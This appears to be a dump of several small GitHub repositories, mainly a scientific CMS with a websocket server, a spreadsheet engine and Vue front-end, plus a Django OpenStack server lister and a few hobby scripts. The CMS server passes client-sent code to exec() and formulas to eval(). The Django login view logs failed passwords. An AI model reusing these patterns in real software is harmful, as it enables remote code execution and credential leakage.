ast\n\nfrom bottle import request, Bottle, abort, static_file\nfrom gevent.pywsgi import WSGIServer\nfrom geventwebsocket import WebSocketError\nfrom geventwebsocket.handler import WebSocketHandler\n\nfrom spreadsheet import Spreadsheet\nfrom widgets import render\nfrom trivial_tools import safely, get_locker\nimport pages\n\napp = Bottle()\nsheets = {}\nclients = {}\nlocker = get_locker()\n\[email protected]('/static/<path:path>')\ndef static(path):\n return static_file(path, root='static')\n\[email protected]('/pages/search')\ndef search():\n items = pages.search(request.query['keywords'].split())\n return {'status':'success', 'data':'items'}\n\[email protected]('/pages/<name>', method=\"GET\")\ndef get_page(name):\n item = pages.retrieve(name)\n return {'status':'success', 'data':'item'}\n\[email protected]('/pages/<name>', method=\"POST\")\ndef post_page(name): \n pages.store(id=name, title=request.json['title'], markup=request.json['markup'], code=request.json['code'])\n return {'status':'success'}\n\[email protected]('/websocket')\ndef handle_websocket():\n # assign a uuid to the client\n client_id = str(uuid.uuid4()) \n print client_id,'websocket connected'\n # request the websocket\n ws = request.environ.get('wsgi.websocket')\n if not ws:\n abort(400, 'Expected WebSocket request.')\n clients[client_id] = ws\n state = None\n while True: \n try:\n raw_msg = ws.receive()\n except:\n break\n msg = safely(lambda: json.loads(raw_msg)) \n if not msg:\n time.sleep(0.1)\n continue \n print 'msg:', msg\n command = msg.get('command') \n # {command: \"search\", keywords: \"hello world\"}\n if command == 'search': \n keywords = msg['keywords'].split()\n items = pages.search(keywords)\n ws.send(json.dumps({'command':'search-results', 'items':items}))\n # {command: \"open\", id: \"r18r4g18734tr1087t\"}\n elif command == 'open': \n id = msg['id']\n locker(lambda: id in sheets or sheets.update({id: Spreadsheet(id)}))\n page = pages.retrieve(id) or {'id':id, 'title':'new page', 'markup':'', 'code':''}\n ws.send(json.dumps({'command':'page', 'page':page}))\n # {command: \"compute\", id: \"...\" code: \"...\", formulas: {..}}\n elif command == 'compute':\n id = msg['id']\n if not id in sheets: 
continue\n sheet = sheets[id]\n if 'code' in msg:\n context = {}\n try:\n exec(msg['code'], {}, context) # NOT SAFE CHECK THIS HERE\n sheets[id].context = context\n except:\n pass\n changes = msg['formulas']\n if changes == None: return\n for key in changes.keys():\n if not changes[key] == '=':\n safely(lambda: changes.update({key:ast.literal_eval(changes[key])}))\n changes = locker(lambda: sheets[id].process(changes))\n values = {key:render(value) for key, value in changes['values'].iteritems()}\n ws.send(json.dumps({'command':'values', 'values':values}))\n # {command: \"save\", page: {id:..., title:..., markup:..., code:...} }\n elif command == 'save':\n pages.store(**msg['page'])\n\ndef main():\n server = WSGIServer((\"127.0.0.1\", 8000), app, handler_class=WebSocketHandler)\n server.serve_forever()\n\nif __name__ == '__main__': main()\n" }, { "alpha_fraction": 0.5601202249526978, "alphanum_fraction": 0.5731462836265564, "avg_line_length": 28.352941513061523, "blob_id": "f7d2906a6e620745597ee1ba4110924ce94de4a0", "content_id": "b4f49d031789b0b8e967992bbabb8eac49aae5d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 998, "license_type": "no_license", "max_line_length": 100, "num_lines": 34, "path": "/pages.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import rethinkdb as r\n\nr.connect( \"localhost\", 28015).repl()\ntry:\n r.table_create(\"pages\").run()\nexcept:\n pass # page table already exists\n\ndef store(id, title, markup, code):\n res = r.table(\"pages\").replace({'id': id, 'title': title, 'markup': markup, 'code': code}).run()\n if res['replaced'] == 0:\n r.table(\"pages\").insert({'id': id, 'title': title, 'markup': markup, 'code': code}).run()\n\ndef retrieve(id):\n return r.table(\"pages\").get(id).run()\n\ndef search(keywords):\n results = []\n pages = r.table(\"pages\").run()\n for page in pages:\n print page['title'], keywords\n if all(keyword in page['title'] for keyword in keywords):\n results.append({'id':page['id'], 'title':page['title']})\n return results\n\nif __name__ == '__main__':\n store(1,'test1','','')\n store(2,'test2','','')\n store(3,'test3','','')\n #print search(['test'])\n #print retrieve(1)\n pages = r.table(\"pages\").run()\n for page in pages:\n print page\n" }, { "alpha_fraction": 0.5386138558387756, "alphanum_fraction": 0.5409901142120361, "avg_line_length": 30.962024688720703, "blob_id": "5df8cb8d1cd14c653df7666691619cba42d760bf", "content_id": "21cdd328ea3457221a236aafd65d46291f52e7ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2525, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/spreadsheet.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport copy\nimport json\nimport cPickle as pickle\n\nclass Spreadsheet(object):\n\n regex_string = re.compile('\\w+')\n\n def __init__(self, name):\n self.name = name\n self.formulas = {}\n self.values = {}\n self.context = {}\n\n def load(self, name):\n if os.path.exists(name):\n with open(name) as myfile:\n data = pickle.load(myfile)\n self.formulas, self.values = data['fomulas'], data['values'] \n\n def save(self, name):\n with open(name, 'w') as myfile:\n data = {'fomulas':self.formulas, 'values':self.values}\n pickle.dump(data, myfile)\n\n def process(self, changes):\n keys = changes.keys()\n for key in changes:\n self.formulas[key] = changes[key]\n self.run()\n 
self.save(self.name)\n return {'formulas':self.formulas, 'values':self.values}\n\n def find_neighbors(self):\n neighbors = {key:[] for key in self.formulas}\n for k, value in self.formulas.iteritems():\n if isinstance(value, basestring) and value[:1] == '=':\n keys = self.regex_string.findall(value)\n [neighbors[i].append(k) for i in keys if i in neighbors]\n return neighbors\n\n def topological_sort(self, neighbors):\n sorted_keys, visited = [], set()\n def visit(k):\n if not k in visited:\n visited.add(k)\n [visit(i) for i in neighbors[k]]\n sorted_keys.insert(0, k)\n [visit(k) for k in self.formulas if k not in visited]\n return sorted_keys\n\n def run(self):\n values = copy.copy(self.context)\n neighbors = self.find_neighbors()\n sorted_keys = self.topological_sort(neighbors)\n for key in sorted_keys:\n value = self.formulas[key]\n if str(value).startswith('='):\n try:\n value = eval(value[1:], {}, values) # NOT SAFE\n except Exception as e:\n value = '<span class=\"error\">%s</span>' % e\n values[key] = value\n self.values = {key: values[key] for key in self.formulas}\n \ndef main():\n import math\n s = Spreadsheet('test')\n s.context = vars(math)\n formulas = dict(x=\"=sin(c+a)\", a=1, b=2, c='=a+d+e', d='=b-a', e='=a+b')\n print s.process(formulas)\n changes = dict(a=2)\n print s.process(changes)\n s.save('test.pickle')\n s.load('test.pickle')\n \nif __name__ == '__main__': main()\n" }, { "alpha_fraction": 0.4901773929595947, "alphanum_fraction": 0.49322906136512756, "avg_line_length": 39.03053283691406, "blob_id": "1a420fa7958ddddfa92a50a88b523b82d778fd81", "content_id": "34eb100230d46015dcc83f81899f00151da0a60d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5243, "license_type": "permissive", "max_line_length": 117, "num_lines": 131, "path": "/static/js/cms.js", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "let init_app = () => {\n let app = {};\n app.metamarked = (text) => {\n text = text.replace(/\\[\\[(\\w+\\:.*?)\\]\\]/g,(m)=>{\n let idx = m.indexOf(':');\n let name = m.substr(2,idx-2);\n let value = m.substr(idx+1,m.length-idx-3); \n if(['True','False'].indexOf(value)>=0) {\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n return '<input type=\"checkbox\" id=\"input-'+name+'\" value=\"'+value+'\"/>';\n } else if(value.indexOf('|')>=0) {\n let items = value.split('|');\n value = items[0];\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n options = items.map((i)=>{return '<option value=\"'+i+'\">'+i+'</option>';}).join('');\n return '<select id=\"input-'+name+'\">'+options+'</select>';\n } else {\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n return '<input type=\"text\" id=\"input-'+name+'\" value=\"'+value+'\"/>';\n }\n });\n text = text.replace(/\\[\\[(\\w+\\=.*?)\\]\\]/g, (m)=>{\n let idx = m.indexOf('=');\n let name = m.substr(2,idx-2);\n let formula = m.substr(idx,m.length-idx-2);\n app.vue.formulas[name] = formula;\n return '<span id=\"output-'+name+'\" >'+formula+'</span>';\n });\n text = marked(text);\n return text;\n };\n app.process = () => {\n let data = {'values':app.vue.values, 'formulas':app.vue.formulas};\n axios.post('/compute',data).then(app.handle_response);\n };\n app.command_page = (data) => {\n console.log('received command \"page\"');\n app.vue.title = data.page.title;\n app.vue.markup = data.page.markup;\n app.vue.code = data.page.code;\n Vue.nextTick(app.send_formulas);\n };\n app.command_values = 
(data) => {\n for(let key in data.values) { \n if(data.values[key][0]=='<')\n jQuery('#output-'+key).html(data.values[key]);\n else\n jQuery('#output-'+key).text(data.values[key]);\n }\n };\n app.command_search_results = (data) => {\n app.vue.search_results = data.items;\n };\n app.handle_response = (data) => {\n data = JSON.parse(data);\n if(data.command == 'page' && data.page.id == app.vue.id) app.command_page(data);\n else if(data.command == 'values') app.command_values(data);\n else if(data.command == 'search-results') app.command_search_results(data);\n };\n app.onkeyup = (event) => {\n let elem = jQuery(event.target);\n let value = null;\n let name = event.target.id.substr(6);\n if(elem.attr('type')=='checkbox') value = elem.is(':checked'); else value = elem.val();\n app.vue.values[name] = value;\n app.vue.formulas[name] = value;\n app.send_formulas();\n };\n app.reconnected = () => {\n console.log('reconnecting...');\n let data = {'command':'open', 'id':app.vue.id};\n app.ws.send(JSON.stringify(data));\n }; \n app.save = () => {\n let page = {'id':app.vue.id, 'title':app.vue.title, 'markup':app.vue.markup, 'code':app.vue.code};\n let data = {'command':'save', 'page':page};\n app.ws.send(JSON.stringify(data));\n };\n app.send_formulas = () => {\n let data = {'command':'compute', 'id':app.vue.id, 'formulas':app.vue.formulas, 'code':app.vue.code};\n console.log(data);\n app.ws.send(JSON.stringify(data));\n };\n app.init = () => {\n app.vue.id = window.location.hash.substr(1) || 'home';\n app.domain = window.location.href.split('/')[2];\n app.ws = new ReconnectingWebSocket('ws://'+app.domain+'/websocket');\n app.ws.onopen = app.reconnected;\n app.ws.onmessage = (evt) => { app.handle_response(evt.data); };\n jQuery('.output').on('keyup','input[type=text]',app.onkeyup);\n jQuery('.output').on('change','select,input[type=checkbox]',app.onkeyup);\n jQuery(window).on('hashchange', () => { app.vue.id=window.location.hash.substr(1); app.reconnected(); });\n };\n app.tonew = () => {\n window.location = window.location.href.split('#')[0]+'#'+Math.random();\n };\n app.search = () => {\n app.ws.send(JSON.stringify({'command':'search', 'keywords':app.vue.keywords}));\n };\n app.data = {\n id: '',\n title: '',\n markup: '',\n code: '',\n formulas: {},\n values: {},\n keywords: '',\n search_results: []\n };\n app.methods = {\n metamarked: app.metamarked,\n save: app.save, \n tonew: app.tonew\n };\n app.filters = {\n };\n app.watch = {\n 'markup': app.send_formulas,\n 'keywords': app.search,\n 'id': app.reconnect,\n 'code': app.send_formulas\n };\n app.vue = new Vue({el: '#target', data: app.data, methods: app.methods, filters: app.filters, watch: app.watch});\n app.init();\n return app;\n};\n \nlet app = init_app();" }, { "alpha_fraction": 0.3866608440876007, "alphanum_fraction": 0.3918918967247009, "avg_line_length": 30.875, "blob_id": "964457e9a6bb7f07e68b31230b6234b1a37ddf8e", "content_id": "432e60420717754a0cd554a00d56460894f44ef4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2294, "license_type": "permissive", "max_line_length": 73, "num_lines": 72, "path": "/static/js/main.js", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "let app_init = () => {\n let app = {};\n let vue = app.vue = new Vue({\n el: '#target',\n data: {\n selected_key: null,\n selected_value: null,\n rows: [],\n cols: [],\n cells: {},\n values: {},\n to: {},\n from: {},\n },\n methods: {\n select: (key) => { app.select(key); }\n 
},\n watch: {\n selected_value: (value) => { app.selected_value(value); }\n }\n });\n app.select = (key) => {\n vue.selected_key = key;\n vue.selected_value = vue.cells[key];\n vue.$refs.input.focus();\n };\n app.selected_value = (value) => {\n let key = vue.selected_key; \n let keys = value.match(/\\w+/ig)||[];\n vue.cells[key] = vue.selected_value;\n keys = keys.filter((key) => { return key in vue.cells; });\n if(JSON.stringify(keys)!=JSON.stringify(JSON.stringify)) {\n let f = (i) => { return i!=key; };\n let g = (k) => { vue.from[k] = vue.from[k].filter(f); };\n vue.to[key].map(g);\n vue.to[key] = keys;\n keys.map((k)=>{ vue.from[k].push(key);});\n } \n app.update(key)\n };\n app.update = (key) => {\n let old_value = vue.values[key];\n let value = vue.cells[key];\n if(old_value!=value) {\n if((''+value)[0]=='=') {\n try {\n value = math.eval(value.substr(1), vue.values);\n value = (typeof value == typeof {})?'obj':value;\n } catch(e) { value = 'error'; }\n }\n vue.values[key] = value;\n vue.from[key].map(app.update);\n }\n };\n app.init = () => {\n for(let i=1; i<=100; i++) {\n app.vue.rows.push(i);\n for(let j=1; j<=26; j++) {\n var c = String.fromCharCode(64+j);\n if(i==1) app.vue.cols.push(c);\n let key = c+i;\n app.vue.cells[key] = app.vue.values[key] = '';\n app.vue.to[key] = [];\n app.vue.from[key] = [];\n }\n }\n };\n app.init();\n return app;\n};\n \nlet app = app_init();" } ]
6
ayasakov/actual_server_list
https://github.com/ayasakov/actual_server_list
0c4d2acda1a16e356cb4575b40d41d76ececc565
1fe917d6daa38e1ed882f5a3dc331cd4661755d2
b43d3b9bef8879e0adc719a87264b078fea3a13c
refs/heads/master
2021-01-20T11:44:06.878580
2013-11-19T10:54:13
2013-11-19T10:54:13
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5283018946647644, "alphanum_fraction": 0.5283018946647644, "avg_line_length": 12.25, "blob_id": "06fd422429ff47b6632796b0b41830dedb6a917a", "content_id": "8d2b1ed02d9f97c30c118fefcb122c2fd419ff4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/README.md", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "actual_server_list\n==================\n\npython+django\n" }, { "alpha_fraction": 0.5340909361839294, "alphanum_fraction": 0.5340909361839294, "avg_line_length": 34.20000076293945, "blob_id": "23673315fde96d881da0101d861e6286d65724d2", "content_id": "6ec9679c0df219759f89db31b9351b4212cfc4a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "no_license", "max_line_length": 70, "num_lines": 5, "path": "/web/web/urls.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n url(r'^checkList/', include('checkList.urls')),\n )\n" }, { "alpha_fraction": 0.44071856141090393, "alphanum_fraction": 0.44431138038635254, "avg_line_length": 27.79310417175293, "blob_id": "1e25f9356ebc32fe146e8cafa63e83c088927112", "content_id": "87cccdc4eebedf8e012a87cb7c7009f124abaab6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 835, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/web/checkList/listServers.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from novaclient.v1_1 import client\n\n\nclass List:\n\n def __init__(self, user, password, project_id, auth_url):\n self.nova = client.Client(user, password,\n project_id=project_id,\n auth_url=auth_url)\n\n def buildList(self):\n #result = [{'name': 'Name Server',\n # 'status': 'Status Server',\n # 'ip': 'Adresses',\n # }]\n result = []\n\n try:\n listServer = self.nova.servers.list()\n except:\n return result\n\n for server in listServer:\n result.append({\n 'name': server.name,\n 'status': server.status,\n 'ip': ''.join(server.addresses['private'][0]['addr'])\n })\n return result\n" }, { "alpha_fraction": 0.6043645739555359, "alphanum_fraction": 0.6048780679702759, "avg_line_length": 27.021583557128906, "blob_id": "34f45a9019775729e237c44639460bd58c8bf0f6", "content_id": "92e4ad00dac1a79f679db7572eddb5950ff57a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3895, "license_type": "no_license", "max_line_length": 78, "num_lines": 139, "path": "/web/checkList/views.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth import authenticate, login\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nimport json\n\n\nfrom checkList.forms import UserForm, UserProfileForm\nfrom checkList import listServers\n\n\ndef index(request):\n context = RequestContext(request)\n context_dict = \"\"\n return render_to_response('checkList/index.html', context_dict, context)\n\n\ndef register(request):\n context = 
RequestContext(request)\n registered = False\n\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n\n user.set_password(user.password)\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n\n profile.save()\n registered = True\n\n else:\n print user_form.errors, profile_form.errors\n\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render_to_response(\n 'checkList/register.html',\n {\n 'user_form': user_form,\n 'profile_form': profile_form,\n 'registered': registered\n },\n context)\n\n\ndef user_login(request):\n context = RequestContext(request)\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('/checkList/')\n else:\n return HttpResponse(\"Your account is disabled.\")\n else:\n print \"Invalid login details: {0}, {1}\".format(username, password)\n return HttpResponse(\"Invalid login details supplied.\")\n\n else:\n return render_to_response('checkList/login.html', {}, context)\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect('/checkList/')\n\n\ndef about(request):\n return HttpResponse(\"Page about this project. Comming soon...\")\n\n\n@login_required\ndef user_edit(request):\n context = RequestContext(request)\n user_profile = request.user.get_profile()\n\n edited = False\n\n if request.method == 'POST':\n profile_form = UserProfileForm(data=request.POST,\n instance=user_profile)\n\n if profile_form.is_valid():\n profile_form.save()\n edited = True\n\n else:\n print profile_form.errors\n\n else:\n profile_form = UserProfileForm(\n initial={'login_nova': user_profile.login_nova,\n 'password_nova': user_profile.password_nova,\n 'project_id': user_profile.project_id,\n 'auth_url': user_profile.auth_url})\n\n return render_to_response(\n 'checkList/edit.html',\n {'profile_form': profile_form, 'edited': edited},\n context)\n\n\n@login_required\ndef list(request):\n context = RequestContext(request)\n\n user = context['user']\n context_dict = \"\"\n\n if user.is_active:\n profile = user.get_profile()\n ListServer = listServers.List(profile.login_nova,\n profile.password_nova,\n profile.project_id,\n profile.auth_url)\n context_dict = ListServer.buildList()\n\n return HttpResponse(json.dumps(context_dict),\n content_type=\"application/json\")\n" }, { "alpha_fraction": 0.6551265120506287, "alphanum_fraction": 0.6671105027198792, "avg_line_length": 26.851852416992188, "blob_id": "d48d753550c0f5990dbc0012c0dcf1686c4479d8", "content_id": "d1b027c6d64e3446ec1e94f12a5c2b50fff7d15f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 751, "license_type": "no_license", "max_line_length": 79, "num_lines": 27, "path": "/setup.py", "repo_name": "ayasakov/actual_server_list", "src_encoding": "UTF-8", "text": "from distutils.core import setup\nfrom subprocess import Popen, PIPE\nimport argparse\n\ndef check_pep8():\n print Popen(\"pep8 web/\", shell=True, stdin=PIPE, stdout=PIPE).stdout.read()\n\ndef init_argparser():\n parser = argparse.ArgumentParser(description='Argument for setup.py')\n parser.add_argument('pep8', help='Check pep8', default=None, nargs='*')\n 
parser.add_argument('unittest', help='Run test', default=None, nargs='*')\n return parser.parse_args()\n\ndef tests():\n pass\n\nargs = init_argparser()\n\nif args.pep8 and args.unittest is None:\n setup(name='checkList',\n version='1.0',\n py_modules=['listServers'])\nelse:\n if args.pep8 is not None:\n check_pep8()\n if args.unittest is not None:\n tests()" } ]
5
StefanM98/Project-Movie-Trailer-Website
https://github.com/StefanM98/Project-Movie-Trailer-Website
3dad29f15ee82a8d7347c9cdcc054ca279763dc4
4ef5c0c0dd73fc7a4c5121ea753239052ada6134
f523bcbd4140d97e802c1393910190cbec9e29d4
refs/heads/master
2021-01-22T18:50:03.795588
2017-03-15T23:03:05
2017-03-15T23:03:05
85,118,761
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.533812940120697, "alphanum_fraction": 0.5546762347221375, "avg_line_length": 42.4375, "blob_id": "d678af467983e42e6ddffa6e742cd19a0d265b46", "content_id": "4557fd704425d126a72d11cc6c5818b75f2ca682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/entertainment_center.py", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "import media\nimport fresh_tomatoes\n\n# Create new instances of the Movie class for each movie\nmoana = media.Movie(\"Moana\",\n \"https://upload.wikimedia.org/wikipedia/en/2/26/\"\n \"Moana_Teaser_Poster.jpg\",\n \"https://youtu.be/LKFuXETZUsI\")\n\nzootopia = media.Movie(\"Zootopia\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/\"\n \"e/ea/Zootopia.jpg/220px-Zootopia.jpg\",\n \"https://youtu.be/jWM0ct-OLsM\")\n\ndeadpool = media.Movie(\"Deadpool\",\n \"https://upload.wikimedia.org/wikipedia/en/4/46/\"\n \"Deadpool_poster.jpg\",\n \"https://youtu.be/ONHBaC-pfsk\")\ndumb_and_dumber = media.Movie(\"Dumb and Dumber\",\n \"https://images-na.ssl-images-amazon.com/\"\n \"images/I/51XVZYDA0ZL.jpg\",\n \"https://youtu.be/l13yPhimE3o\")\nwalle = media.Movie(\"WALL-E\",\n \"http://www.gstatic.com/tv/thumb/movieposters/\"\n \"174374/p174374_p_v8_ab.jpg\",\n \"https://youtu.be/vbLNOFbsRow\")\n\n# Place all our movies into an array\nmovies = [moana, zootopia, deadpool, dumb_and_dumber, walle]\n\n# Pass the movies array to the open_movies_page function to create the page\nfresh_tomatoes.open_movies_page(movies)\n" }, { "alpha_fraction": 0.6816901564598083, "alphanum_fraction": 0.6901408433914185, "avg_line_length": 21.1875, "blob_id": "523daa507d32f63ebd86ff9f47878f29c9f3c976", "content_id": "5c7e0aaaf06518367fb3288692692936742f4b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 355, "license_type": "no_license", "max_line_length": 78, "num_lines": 16, "path": "/README.txt", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "Movie Trailer Website\n=====================\n\nTo Run:\n-------\n\n1. Ensure Python is installed\n2. Open the containing folder\n3. Double click entertainment_center.py\n\nDescription:\n------------\n\nThis program will store a list of your favorite movies, including their names,\nbox art imagery, and a movie trailer URL. It will then serve this data as a\nweb page.\n" }, { "alpha_fraction": 0.6754966974258423, "alphanum_fraction": 0.6754966974258423, "avg_line_length": 32.55555725097656, "blob_id": "a8d28ccd96fe05d1a50c0efac8034f674c59fdf7", "content_id": "8899911abd50ad312af7173a68555510c1a703cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/media.py", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "\"\"\"Define the Movie class which gives us the basic format of each\nmovie instance upon initalization.\"\"\"\n\n\nclass Movie():\n def __init__(self, movie_title, box_art, trailer_link):\n self.title = movie_title\n self.poster_image_url = box_art\n self.trailer_youtube_url = trailer_link\n" } ]
3
JMRedford/Lair-Generator
https://github.com/JMRedford/Lair-Generator
dbaca3056941e638bbd6e3f06cb56ea0ed74159a
f1b3588eebd3ec2819a621772e9f96d02a49c378
f8b1aacd627ac18dbdc4fcf85aa52f538a40f558
refs/heads/master
2021-01-01T15:55:34.291765
2015-08-17T20:01:52
2015-08-17T20:01:52
40,559,062
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.804347813129425, "alphanum_fraction": 0.804347813129425, "avg_line_length": 10.75, "blob_id": "9ba13eae77e5a49e82bb01ca270e330f4896fbde", "content_id": "68e1e25df37a0cf9ae128bf41b141b7be40669a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/README.md", "repo_name": "JMRedford/Lair-Generator", "src_encoding": "UTF-8", "text": "# Lair-Generator\n\ndependencies :\npython-pygame" }, { "alpha_fraction": 0.5008460283279419, "alphanum_fraction": 0.592780590057373, "avg_line_length": 27.59677505493164, "blob_id": "6c0a2c5371a1075c8d9cf49d4caf14ea4f2c57d8", "content_id": "a42e98d9a61ab5438aef180422d80fa227a0f06e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 148, "num_lines": 62, "path": "/Lair.py", "repo_name": "JMRedford/Lair-Generator", "src_encoding": "UTF-8", "text": "import pygame, time, random, math\n\nrandom.seed()\n\nxBlocks = 50\nyBlocks = 40\nblockSize = 10\n\nGREY = (200,200,200)\n\npygame.init()\ndisp = pygame.display.set_mode([xBlocks*blockSize,yBlocks*blockSize],pygame.NOFRAME)\n\nmodel = []\nprobs = [[1,0,0,0],[0.5,0.22,0.06,0.22],[0.45,0.23,0.09,0.23],[0.4,0.23,0.14,0.23],[0.35,0.23,0.19,0.23],[0.3,0.24,0.22,0.24],[0.25,0.25,0.25,0.25]]\n\nfor i in range(0,xBlocks):\n model.append([])\n for j in range(0,yBlocks):\n model[i].append([pygame.Rect(i*blockSize,j*blockSize,blockSize,blockSize),0])\n\nmodel[xBlocks/2][yBlocks-2][1] = 1\n\ndef updateModel():\n pos = (xBlocks/2,yBlocks-2)\n lastDir = (0,-1)\n while model[pos[0]][pos[1]][1] > 0:\n randNum = random.random()\n if randNum < probs[min(yBlocks-2-pos[1],6)][0]:\n lastDir = (0,-1)\n pos = (pos[0],pos[1]-2)\n elif randNum < probs[min(yBlocks-2-pos[1],6)][0] + probs[min(yBlocks-2-pos[1],6)][1]:\n lastDir = (1,0)\n pos = (pos[0]+2,pos[1])\n elif randNum < probs[min(yBlocks-2-pos[1],6)][0] + probs[min(yBlocks-2-pos[1],6)][1] + probs[min(yBlocks-2-pos[1],6)][2]:\n lastDir = (0,1)\n pos = (pos[0],pos[1]+2)\n else: \n lastDir = (-1,0)\n pos = (pos[0]-2,pos[1])\n model[pos[0]][pos[1]][1] = 1\n model[pos[0]-lastDir[0]][pos[1]-lastDir[1]][1] = 1\n print('update model')\n\ndef updateView():\n for i in range(0,xBlocks):\n for j in range(0,yBlocks):\n if model[i][j][1] == 1:\n surf = pygame.Surface((blockSize,blockSize))\n surf.fill(GREY)\n disp.blit(surf,model[i][j][0])\n pygame.display.flip()\n\nwhile(1):\n e = pygame.event.poll()\n if (e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE):\n break\n if (e.type == pygame.KEYDOWN and e.key == pygame.K_PERIOD):\n updateModel()\n updateView()\n\npygame.quit()\n" } ]
2
RinaldoBoeje/AntiNetflixAddiction
https://github.com/RinaldoBoeje/AntiNetflixAddiction
7217a10ac9a9235bdc42d90c277212cc3092e0bf
58b2617ba1cf1b74b2d843ed4017213e6382218a
40b73c24befe85a8ef37a7e9055da80217ef1859
refs/heads/master
2023-07-05T16:06:04.115918
2021-08-09T19:40:19
2021-08-09T19:40:19
394,406,678
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6247411966323853, "alphanum_fraction": 0.6366459727287292, "avg_line_length": 25.600000381469727, "blob_id": "024e6e1e5f48652f08868945c46bae771b1e5dd5", "content_id": "4b08447b05a65c0fcbbc55ef40fd51399e64f74f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1932, "license_type": "no_license", "max_line_length": 90, "num_lines": 70, "path": "/src/main.py", "repo_name": "RinaldoBoeje/AntiNetflixAddiction", "src_encoding": "UTF-8", "text": "#Information sources: \r\n#https://www.geeksforgeeks.org/python-using-pil-imagegrab-and-pytesseract/\r\n\r\n#steps: \r\n#1: using PIL (imageGrab) take a shot of the screen\r\n#2: using pyTesseract look on screen for x\r\n# x = inputted Text\r\n#3: if x is found, start a 15 second countdown to \"application\" shutdown. Or \"pc\" shutdown\r\n# make compatible with Windows and Linux machines, Fuck Mac OSX\r\n\r\nimport os\r\nimport platform\r\nimport numpy as nm\r\nimport pytesseract\r\nimport cv2\r\nfrom PIL import ImageGrab\r\n\r\n\r\ninput == \"Next Episode\"\r\n\r\n#Take image of screen\r\ndef screenGrab():\r\n #take image of screen\r\n #TODO: Remove\r\n print(\"screenGrab test\")\r\n foundString = \"placeholder\"\r\n\r\n # Path of tesseract executable\r\n pytesseract.pytesseract.tesseract_cmd ='**Path to tesseract executable**'\r\n while(True):\r\n \r\n # ImageGrab-To capture the screen image in a loop. \r\n # Bbox used to capture a specific area.\r\n cap = ImageGrab.grab(bbox =(700, 300, 1400, 900))\r\n \r\n # Converted the image to monochrome for it to be easily \r\n # read by the OCR and obtained the output String.\r\n foundString = pytesseract.image_to_string(\r\n cv2.cvtColor(nm.array(cap), cv2.COLOR_BGR2GRAY), \r\n lang ='eng')\r\n print(foundString)\r\n\r\n return foundString\r\n\r\n\r\n#look on screen for x\r\ndef screenSearch(inputString, foundString):\r\n #search on screen\r\n #TODO: Remove\r\n if inputString == foundString:\r\n systemShutdown\r\n\r\n\r\n#shutdown system\r\ndef systemShutdown():\r\n system = platform.system()\r\n\r\n if system == 'Windows':\r\n #Windows based\r\n os.system(\"shutdown /s /t 1\") \r\n elif system == 'Linus' or system == 'Darwin':\r\n #unix based\r\n 